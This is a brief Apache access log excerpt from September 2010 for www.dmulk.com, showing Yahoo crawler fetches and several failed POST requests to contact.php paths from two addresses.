67.195.114.243 - - [02/Sep/2010:11:06:01 -0700] "GET /megumi/?S=A HTTP/1.0" 200 1595 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.114.243 - - [02/Sep/2010:11:06:21 -0700] "GET /bikes/dteel/CreSTOC08/?N=A HTTP/1.0" 200 6009 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:11:06:31 -0700] "POST /logs/access_090322.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:11:06:31 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:11:06:34 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
69.10.136.189 - - [02/Sep/2010:11:06:59 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
69.10.136.189 - - [02/Sep/2010:11:06:59 -0700] "POST /logs/access_080104.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
